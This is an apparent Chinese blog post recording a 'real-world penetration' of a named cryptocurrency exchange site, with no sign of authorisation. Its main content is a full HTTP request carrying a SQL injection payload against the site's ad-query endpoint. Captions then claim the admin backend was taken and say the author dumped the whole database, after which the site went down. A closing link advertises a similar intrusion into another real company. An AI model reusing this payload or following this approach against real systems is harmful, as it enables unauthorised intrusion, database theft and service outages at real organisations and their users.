loading...
对ftftx的渗透测试
Published in:2022-04-02 | category: 实战渗透

目标:

截屏

截屏2022-04-02 08.52.55

前台地址:

FTFTX-全球数字货币交易所综合平台排行

截屏2022-04-02 10.55.22

漏洞地址:

telegram-cloud-photo-size-5-6215312655569235524-y

SQL包情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
GET /ad/queryAll?position=index%27and%27e%27%3D%27e HTTP/1.1
Host: pc.ftftx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US
Autho_token: undefined
Origin: https://www.ftftx.com
Referer: https://www.ftftx.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
X-Forwarded-For: 43.135.2.75
X-Forwarded-Host: pc.ftftx.com
X-Forwarded-Proto: https
X-Forwarded-Url: https://pc.ftftx.com/ad/queryAll?position=index
Accept-Encoding: gzip

后台攻破:

截屏2022-04-02 12.22.47

截屏2022-04-02 12.27.31

截屏2022-04-02 12.27.02

注:最后手误脱全裤站点死了

Next:
对柬埔寨申通的实战渗透
catalog
catalog